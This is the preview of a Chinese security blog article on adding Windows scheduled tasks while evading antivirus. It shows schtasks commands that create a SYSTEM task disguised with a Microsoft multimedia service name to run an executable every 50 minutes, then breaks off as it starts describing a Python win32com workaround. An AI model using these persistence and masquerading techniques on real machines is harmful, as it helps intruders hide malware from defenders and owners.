免杀 ｜ 使用技巧绕过杀软添加计划任务。

文章预览

申明 ：本次测试只作为学习用处，请勿未授权进行渗透测试，切勿用于其它用途！ 公众号现在只对常读和星标的公众号才展示大图推送， 建议大家把 明暗安全  设为星标，否则可能就看不到啦！ 1.漏洞背景 计划任务的添加，一般来说为 schtasks /create /ru system /tn “Microsoft\Windows\Multimedia\SystemMediaService” /sc MINUTE /mo 50 /tr “C:\Windows\system.exe” /st 16:22 /f (创建一个名为Microsoft\Windows\Multimedia\SystemMediaService, 16:22开始执行，每50分钟执行一次) SCHTASKS /Run /TN “Microsoft\Windows\Multimedia\SystemMediaService” /f (启动计划任务) schtasks /delete /tn “Microsoft\Windows\Multimedia\SystemSoundsService” /f(删除计划任务) 然而，有存在杀软的情况下，添加计划任务是被禁止的。 通过fuzz，发现powershell添加杀软的方式被彻底堵死了（个人尝试） 分析： 这个Python脚本使用了win32com.client库来与Wind ………………………………